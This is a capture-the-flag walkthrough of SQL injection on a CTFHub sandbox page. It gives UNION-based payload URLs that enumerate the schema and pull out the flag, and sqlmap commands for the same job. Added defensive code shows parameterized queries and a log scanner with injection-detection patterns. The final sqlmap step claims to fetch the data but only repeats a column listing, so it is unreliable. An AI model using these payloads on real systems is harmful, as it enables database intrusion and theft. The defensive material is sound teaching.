1. Manual injection
Approach: injection point -> database -> table -> column -> data
First, use ORDER BY to find out how many columns the query returns
http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=1 order by 2
We see that order by 2 still produces output, while order by 3 produces none, so the column count is 2
Next, use a UNION-based injection
http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select database(),user()
This returns the user name and the current database name
Get the list of databases
http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(schema_name) from information_schema.schemata
Look up the table names in the current database
http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
Get the column names (0x666c6167 is the hex encoding of the string 'flag', which avoids putting quotes in the payload)
http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x666c6167
Get the data
http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 union select 1,group_concat(flag) from flag
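To make the column-count probe and the UNION step above concrete from the defender's side, here is an added example (not part of the original writeup and not the challenge's own source) that builds the same shape of query against an in-memory SQLite database: `lookup_vulnerable` pastes the id straight into the SQL text, the way the challenge does, while `lookup_safe` validates the value and binds it as a parameter. The `news` table, the placeholder flag value and the SQLite `?` placeholder syntax are assumptions (MySQL connectors use `%s` or `?` depending on the driver; the idea is the same).

```python
import re
import sqlite3

# Constructed in-memory schema mirroring the challenge: a table the page
# queries by id, plus a `flag` table whose contents must never leak.
# Table name and flag value are placeholders, not the challenge's real data.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'Hello'), (2, 'World');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('ctfhub{placeholder_flag}');
    """)
    return conn


def lookup_vulnerable(conn, raw_id):
    # Vulnerable: the request parameter is interpolated into the SQL text,
    # so "-1 union select 1,flag from flag" becomes part of the statement.
    sql = f"SELECT id, title FROM news WHERE id={raw_id}"
    return conn.execute(sql).fetchall()


def probe_vulnerable(conn, raw_id):
    # Models the ORDER BY probe from the writeup: True if the query ran
    # (the page shows output), False if the database raised an error.
    # ORDER BY 3 on a 2-column SELECT is an error, which is how the column
    # count is inferred.
    try:
        lookup_vulnerable(conn, raw_id)
        return True
    except sqlite3.OperationalError:
        return False


def lookup_safe(conn, raw_id):
    # Hardened: reject anything that is not an integer, then bind the value.
    # A bound parameter is sent as data, never parsed as SQL, so UNION or
    # ORDER BY text in the input cannot change the statement.
    if not re.fullmatch(r"-?\d+", raw_id):
        raise ValueError("id must be an integer")
    sql = "SELECT id, title FROM news WHERE id=?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


# Same payload shape as the last manual step above (two columns, flag in
# the second one so it shows up where the title would be rendered).
PAYLOAD = "-1 union select 1,flag from flag"


def demo():
    conn = make_db()
    probes = {p: probe_vulnerable(conn, p) for p in ("1 order by 2", "1 order by 3")}
    leaked = lookup_vulnerable(conn, PAYLOAD)
    try:
        safe = lookup_safe(conn, PAYLOAD)
    except ValueError as e:
        safe = f"rejected: {e}"
    return probes, leaked, safe


if __name__ == "__main__":
    print(demo())
```

Running `demo()` shows the three behaviours side by side: the ORDER BY probes succeed at 2 and fail at 3, the vulnerable lookup returns the flag row, and the safe lookup rejects the same input before it ever reaches the database. Validation alone is not the fix; binding the parameter is what removes the injection, the integer check just gives a clean error instead of a database error message that could aid enumeration.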
2. Automated tools
Download sqlmap: GitHub - sqlmapproject/sqlmap: Automatic SQL injection and database takeover tool
python sqlmap.py -u http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=1 --tables
Find the data in the table
python sqlmap.py -u http://challenge-aea2d226b5b3a939.sandbox.ctfhub.com:10800/?id=1 -T flag --columns
Get the data from the table
python sqlmap.py -u http://challenge-215beae2f0b99b12.sandbox.ctfhub.com:10800/?id=-1 -T flag --columns
This yields the flag
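On the detection side, here is an added example (not from the original writeup and not part of sqlmap) that scans web-server access-log lines for the request patterns this walkthrough produces: ORDER BY column probes, UNION SELECT, information_schema enumeration, the boolean `AND 1=1` style probes an automated tool sends, and sqlmap's default User-Agent, which contains the string `sqlmap` unless `--random-agent` is used. The log lines, addresses and timestamps are constructed; the combined log format and the rule names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines in combined format. Addresses, timestamps and
# the challenge path are placeholders, not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /?id=1%20order%20by%203 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /?id=-1%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:12:05:00 +0000] "GET /?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
10.0.0.7 - - [01/Jan/2024:12:06:00 +0000] "GET /?id=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) (?P<size>\d+) '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)

# Rules are matched against the URL-decoded request path, so %20 and +
# encodings of the payloads above are caught. Order matters only for the
# order in which rule names appear in an alert.
RULES = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("bool_probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]
UA_RULE = re.compile(r"sqlmap", re.I)


def scan(log_text):
    """Return one alert per suspicious line: source ip, timestamp, rules hit."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = unquote_plus(m["path"])
        hits = [name for name, rx in RULES if rx.search(path)]
        if UA_RULE.search(m["ua"]):
            hits.append("sqlmap_ua")
        if hits:
            alerts.append({"ip": m["ip"], "ts": m["ts"], "rules": hits})
    return alerts


def by_source(alerts):
    """Count alerts per source address; a single ip walking the whole
    order by -> union -> information_schema sequence is the signal."""
    counts = {}
    for a in alerts:
        counts[a["ip"]] = counts.get(a["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(a)
    print(by_source(found))
```

The size field is worth a look as well: the ORDER BY 3 line returns 200 with a body of 0 bytes, which is exactly the "no output" signal the manual walkthrough relies on, and a run of 200/0 responses followed by an oversized 200 from the same address is a cheap heuristic even when the payload itself is obfuscated past these regexes.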